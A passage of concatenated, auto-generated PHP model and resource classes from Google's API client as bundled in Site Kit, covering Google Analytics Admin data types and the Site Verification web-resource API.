'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1betaAcknowledgeUserDataCollectionResponse'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1alphaAcknowledgeUserDataCollectionRequest extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $acknowledgement; /** * @param string */ public function setAcknowledgement($acknowledgement) { $this->acknowledgement = $acknowledgement; } /** * @return string */ public function getAcknowledgement() { return $this->acknowledgement; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAcknowledgeUserDataCollectionRequest::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1alphaAcknowledgeUserDataCollectionRequest'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1alphaAudienceDimensionOrMetricFilterNumericFilter extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $operation; protected $valueType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAudienceDimensionOrMetricFilterNumericValue::class; protected $valueDataType = ''; /** * @param string */ public function setOperation($operation) { $this->operation = $operation; } /** * @return string */ public function getOperation() { return $this->operation; } /** * @param GoogleAnalyticsAdminV1alphaAudienceDimensionOrMetricFilterNumericValue */ public function setValue(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAudienceDimensionOrMetricFilterNumericValue $value) { $this->value = $value; } /** * @return GoogleAnalyticsAdminV1alphaAudienceDimensionOrMetricFilterNumericValue */ public function getValue() { return $this->value; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAudienceDimensionOrMetricFilterNumericFilter::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1alphaAudienceDimensionOrMetricFilterNumericFilter'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1alphaApproveDisplayVideo360AdvertiserLinkProposalResponse extends \Google\Site_Kit_Dependencies\Google\Model { protected $displayVideo360AdvertiserLinkType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaDisplayVideo360AdvertiserLink::class; protected $displayVideo360AdvertiserLinkDataType = ''; /** * @param GoogleAnalyticsAdminV1alphaDisplayVideo360AdvertiserLink */ public function setDisplayVideo360AdvertiserLink(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaDisplayVideo360AdvertiserLink $displayVideo360AdvertiserLink) { $this->displayVideo360AdvertiserLink = $displayVideo360AdvertiserLink; } /** * @return GoogleAnalyticsAdminV1alphaDisplayVideo360AdvertiserLink */ public function getDisplayVideo360AdvertiserLink() { return $this->displayVideo360AdvertiserLink; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaApproveDisplayVideo360AdvertiserLinkProposalResponse::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1alphaApproveDisplayVideo360AdvertiserLinkProposalResponse'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1alphaAccessDimensionValue extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $value; /** * @param string */ public function setValue($value) { $this->value = $value; } /** * @return string */ public function getValue() { return $this->value; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAccessDimensionValue::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1alphaAccessDimensionValue'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1alphaDataStreamAndroidAppStreamData extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $firebaseAppId; /** * @var string */ public $packageName; /** * @param string */ public function setFirebaseAppId($firebaseAppId) { $this->firebaseAppId = $firebaseAppId; } /** * @return string */ public function getFirebaseAppId() { return $this->firebaseAppId; } /** * @param string */ public function setPackageName($packageName) { $this->packageName = $packageName; } /** * @return string */ public function getPackageName() { return $this->packageName; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaDataStreamAndroidAppStreamData::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1alphaDataStreamAndroidAppStreamData'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1alphaArchiveAudienceRequest extends \Google\Site_Kit_Dependencies\Google\Model { } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaArchiveAudienceRequest::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1alphaArchiveAudienceRequest'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1alphaAttributionSettings extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $acquisitionConversionEventLookbackWindow; /** * @var string */ public $name; /** * @var string */ public $otherConversionEventLookbackWindow; /** * @var string */ public $reportingAttributionModel; /** * @param string */ public function setAcquisitionConversionEventLookbackWindow($acquisitionConversionEventLookbackWindow) { $this->acquisitionConversionEventLookbackWindow = $acquisitionConversionEventLookbackWindow; } /** * @return string */ public function getAcquisitionConversionEventLookbackWindow() { return $this->acquisitionConversionEventLookbackWindow; } /** * @param string */ public function setName($name) { $this->name = $name; } /** * @return string */ public function getName() { return $this->name; } /** * @param string */ public function setOtherConversionEventLookbackWindow($otherConversionEventLookbackWindow) { $this->otherConversionEventLookbackWindow = $otherConversionEventLookbackWindow; } /** * @return string */ public function getOtherConversionEventLookbackWindow() { return $this->otherConversionEventLookbackWindow; } /** * @param string */ public function setReportingAttributionModel($reportingAttributionModel) { $this->reportingAttributionModel = $reportingAttributionModel; } /** * @return string */ public function getReportingAttributionModel() { return $this->reportingAttributionModel; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAttributionSettings::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1alphaAttributionSettings'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1alphaAudienceSimpleFilter extends \Google\Site_Kit_Dependencies\Google\Model { protected $filterExpressionType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAudienceFilterExpression::class; protected $filterExpressionDataType = ''; /** * @var string */ public $scope; /** * @param GoogleAnalyticsAdminV1alphaAudienceFilterExpression */ public function setFilterExpression(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAudienceFilterExpression $filterExpression) { $this->filterExpression = $filterExpression; } /** * @return GoogleAnalyticsAdminV1alphaAudienceFilterExpression */ public function getFilterExpression() { return $this->filterExpression; } /** * @param string */ public function setScope($scope) { $this->scope = $scope; } /** * @return string */ public function getScope() { return $this->scope; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAudienceSimpleFilter::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1alphaAudienceSimpleFilter'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1alphaDataStreamWebStreamData extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $defaultUri; /** * @var string */ public $firebaseAppId; /** * @var string */ public $measurementId; /** * @param string */ public function setDefaultUri($defaultUri) { $this->defaultUri = $defaultUri; } /** * @return string */ public function getDefaultUri() { return $this->defaultUri; } /** * @param string */ public function setFirebaseAppId($firebaseAppId) { $this->firebaseAppId = $firebaseAppId; } /** * @return string */ public function getFirebaseAppId() { return $this->firebaseAppId; } /** * @param string */ public function setMeasurementId($measurementId) { $this->measurementId = $measurementId; } /** * @return string */ public function getMeasurementId() { return $this->measurementId; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaDataStreamWebStreamData::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1alphaDataStreamWebStreamData'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1betaListKeyEventsResponse extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'keyEvents'; protected $keyEventsType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaKeyEvent::class; protected $keyEventsDataType = 'array'; /** * @var string */ public $nextPageToken; /** * @param GoogleAnalyticsAdminV1betaKeyEvent[] */ public function setKeyEvents($keyEvents) { $this->keyEvents = $keyEvents; } /** * @return GoogleAnalyticsAdminV1betaKeyEvent[] */ public function getKeyEvents() { return $this->keyEvents; } /** * @param string */ public function setNextPageToken($nextPageToken) { $this->nextPageToken = $nextPageToken; } /** * @return string */ public function getNextPageToken() { return $this->nextPageToken; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaListKeyEventsResponse::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1betaListKeyEventsResponse'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1alphaAccessMetricValue extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $value; /** * @param string */ public function setValue($value) { $this->value = $value; } /** * @return string */ public function getValue() { return $this->value; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAccessMetricValue::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1alphaAccessMetricValue'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1alphaAudienceFilterExpressionList extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'filterExpressions'; protected $filterExpressionsType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAudienceFilterExpression::class; protected $filterExpressionsDataType = 'array'; /** * @param GoogleAnalyticsAdminV1alphaAudienceFilterExpression[] */ public function setFilterExpressions($filterExpressions) { $this->filterExpressions = $filterExpressions; } /** * @return GoogleAnalyticsAdminV1alphaAudienceFilterExpression[] */ public function getFilterExpressions() { return $this->filterExpressions; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAudienceFilterExpressionList::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1alphaAudienceFilterExpressionList'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\SiteVerification; class SiteVerificationWebResourceGettokenResponse extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $method; /** * @var string */ public $token; /** * @param string */ public function setMethod($method) { $this->method = $method; } /** * @return string */ public function getMethod() { return $this->method; } /** * @param string */ public function setToken($token) { $this->token = $token; } /** * @return string */ public function getToken() { return $this->token; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\SiteVerification\SiteVerificationWebResourceGettokenResponse::class, 'Google\\Site_Kit_Dependencies\\Google_Service_SiteVerification_SiteVerificationWebResourceGettokenResponse'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\SiteVerification; class SiteVerificationWebResourceListResponse extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'items'; protected $itemsType = \Google\Site_Kit_Dependencies\Google\Service\SiteVerification\SiteVerificationWebResourceResource::class; protected $itemsDataType = 'array'; /** * @param SiteVerificationWebResourceResource[] */ public function setItems($items) { $this->items = $items; } /** * @return SiteVerificationWebResourceResource[] */ public function getItems() { return $this->items; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\SiteVerification\SiteVerificationWebResourceListResponse::class, 'Google\\Site_Kit_Dependencies\\Google_Service_SiteVerification_SiteVerificationWebResourceListResponse'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\SiteVerification; class SiteVerificationWebResourceGettokenRequest extends \Google\Site_Kit_Dependencies\Google\Model { protected $siteType = \Google\Site_Kit_Dependencies\Google\Service\SiteVerification\SiteVerificationWebResourceGettokenRequestSite::class; protected $siteDataType = ''; /** * @var string */ public $verificationMethod; /** * @param SiteVerificationWebResourceGettokenRequestSite */ public function setSite(\Google\Site_Kit_Dependencies\Google\Service\SiteVerification\SiteVerificationWebResourceGettokenRequestSite $site) { $this->site = $site; } /** * @return SiteVerificationWebResourceGettokenRequestSite */ public function getSite() { return $this->site; } /** * @param string */ public function setVerificationMethod($verificationMethod) { $this->verificationMethod = $verificationMethod; } /** * @return string */ public function getVerificationMethod() { return $this->verificationMethod; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\SiteVerification\SiteVerificationWebResourceGettokenRequest::class, 'Google\\Site_Kit_Dependencies\\Google_Service_SiteVerification_SiteVerificationWebResourceGettokenRequest'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\SiteVerification; class SiteVerificationWebResourceGettokenRequestSite extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $identifier; /** * @var string */ public $type; /** * @param string */ public function setIdentifier($identifier) { $this->identifier = $identifier; } /** * @return string */ public function getIdentifier() { return $this->identifier; } /** * @param string */ public function setType($type) { $this->type = $type; } /** * @return string */ public function getType() { return $this->type; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\SiteVerification\SiteVerificationWebResourceGettokenRequestSite::class, 'Google\\Site_Kit_Dependencies\\Google_Service_SiteVerification_SiteVerificationWebResourceGettokenRequestSite'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\SiteVerification; class SiteVerificationWebResourceResourceSite extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $identifier; /** * @var string */ public $type; /** * @param string */ public function setIdentifier($identifier) { $this->identifier = $identifier; } /** * @return string */ public function getIdentifier() { return $this->identifier; } /** * @param string */ public function setType($type) { $this->type = $type; } /** * @return string */ public function getType() { return $this->type; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\SiteVerification\SiteVerificationWebResourceResourceSite::class, 'Google\\Site_Kit_Dependencies\\Google_Service_SiteVerification_SiteVerificationWebResourceResourceSite'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\SiteVerification; class SiteVerificationWebResourceResource extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'owners'; /** * @var string */ public $id; /** * @var string[] */ public $owners; protected $siteType = \Google\Site_Kit_Dependencies\Google\Service\SiteVerification\SiteVerificationWebResourceResourceSite::class; protected $siteDataType = ''; /** * @param string */ public function setId($id) { $this->id = $id; } /** * @return string */ public function getId() { return $this->id; } /** * @param string[] */ public function setOwners($owners) { $this->owners = $owners; } /** * @return string[] */ public function getOwners() { return $this->owners; } /** * @param SiteVerificationWebResourceResourceSite */ public function setSite(\Google\Site_Kit_Dependencies\Google\Service\SiteVerification\SiteVerificationWebResourceResourceSite $site) { $this->site = $site; } /** * @return SiteVerificationWebResourceResourceSite */ public function getSite() { return $this->site; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\SiteVerification\SiteVerificationWebResourceResource::class, 'Google\\Site_Kit_Dependencies\\Google_Service_SiteVerification_SiteVerificationWebResourceResource'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\SiteVerification\Resource; use Google\Site_Kit_Dependencies\Google\Service\SiteVerification\SiteVerificationWebResourceGettokenRequest; use Google\Site_Kit_Dependencies\Google\Service\SiteVerification\SiteVerificationWebResourceGettokenResponse; use Google\Site_Kit_Dependencies\Google\Service\SiteVerification\SiteVerificationWebResourceListResponse; use Google\Site_Kit_Dependencies\Google\Service\SiteVerification\SiteVerificationWebResourceResource; /** * The "webResource" collection of methods. * Typical usage is: * <code> * $siteVerificationService = new Google\Service\SiteVerification(...); * $webResource = $siteVerificationService->webResource; * </code> */ class WebResource extends \Google\Site_Kit_Dependencies\Google\Service\Resource { /** * Relinquish ownership of a website or domain. (webResource.delete) * * @param string $id The id of a verified site or domain. * @param array $optParams Optional parameters. * @throws \Google\Service\Exception */ public function delete($id, $optParams = []) { $params = ['id' => $id]; $params = \array_merge($params, $optParams); return $this->call('delete', [$params]); } /** * Get the most current data for a website or domain. (webResource.get) * * @param string $id The id of a verified site or domain. * @param array $optParams Optional parameters. * @return SiteVerificationWebResourceResource * @throws \Google\Service\Exception */ public function get($id, $optParams = []) { $params = ['id' => $id]; $params = \array_merge($params, $optParams); return $this->call('get', [$params], \Google\Site_Kit_Dependencies\Google\Service\SiteVerification\SiteVerificationWebResourceResource::class); } /** * Get a verification token for placing on a website or domain. * (webResource.getToken) * * @param SiteVerificationWebResourceGettokenRequest $postBody * @param array $optParams Optional parameters. * @return SiteVerificationWebResourceGettokenResponse * @throws \Google\Service\Exception */ public function getToken(\Google\Site_Kit_Dependencies\Google\Service\SiteVerification\SiteVerificationWebResourceGettokenRequest $postBody, $optParams = []) { $params = ['postBody' => $postBody]; $params = \array_merge($params, $optParams); return $this->call('getToken', [$params], \Google\Site_Kit_Dependencies\Google\Service\SiteVerification\SiteVerificationWebResourceGettokenResponse::class); } /** * Attempt verification of a website or domain. (webResource.insert) * * @param string $verificationMethod The method to use for verifying a site or * domain. * @param SiteVerificationWebResourceResource $postBody * @param array $optParams Optional parameters. * @return SiteVerificationWebResourceResource * @throws \Google\Service\Exception */ public function insert($verificationMethod, \Google\Site_Kit_Dependencies\Google\Service\SiteVerification\SiteVerificationWebResourceResource $postBody, $optParams = []) { $params = ['verificationMethod' => $verificationMethod, 'postBody' => $postBody]; $params = \array_merge($params, $optParams); return $this->call('insert', [$params], \Google\Site_Kit_Dependencies\Google\Service\SiteVerification\SiteVerificationWebResourceResource::class); } /** * Get the list of your verified websites and domains. * (webResource.listWebResource) * * @param array $optParams Optional parameters. * @return SiteVerificationWebResourceListResponse * @throws \Google\Service\Exception */ public function listWebResource($optParams = []) { $params = []; $params = \array_merge($params, $optParams); return $this->call('list', [$params], \Google\Site_Kit_Dependencies\Google\Service\SiteVerification\SiteVerificationWebResourceListResponse::class); } /** * Modify the list of owners for your website or domain. This method supports * patch semantics. (webResource.patch) * * @param string $id The id of a verified site or domain. * @param SiteVerificationWebResourceResource $postBody * @param array $optParams Optional parameters. * @return SiteVerificationWebResourceResource * @throws \Google\Service\Exception */ public function patch($id, \Google\Site_Kit_Dependencies\Google\Service\SiteVerification\SiteVerificationWebResourceResource $postBody, $optParams = []) { $params = ['id' => $id, 'postBody' => $postBody]; $params = \array_merge($params, $optParams); return $this->call('patch', [$params], \Google\Site_Kit_Dependencies\Google\Service\SiteVerification\SiteVerificationWebResourceResource::class); } /** * Modify the list of owners for your website or domain. (webResource.update) * * @param string $id The id of a verified site or domain. * @param SiteVerificationWebResourceResource $postBody * @param array $optParams Optional parameters. * @return SiteVerificationWebResourceResource * @throws \Google\Service\Exception */ public function update($id, \Google\Site_Kit_Dependencies\Google\Service\SiteVerification\SiteVerificationWebResourceResource $postBody, $optParams = []) { $params = ['id' => $id, 'postBody' => $postBody]; $params = \array_merge($params, $optParams); return $this->call('update', [$params], \Google\Site_Kit_Dependencies\Google\Service\SiteVerification\SiteVerificationWebResourceResource::class); } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\SiteVerification\Resource\WebResource::class, 'Google\\Site_Kit_Dependencies\\Google_Service_SiteVerification_Resource_WebResource'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service; use Google\Site_Kit_Dependencies\Google\Client; /** * Service definition for AnalyticsData (v1beta). * * <p> * Accesses 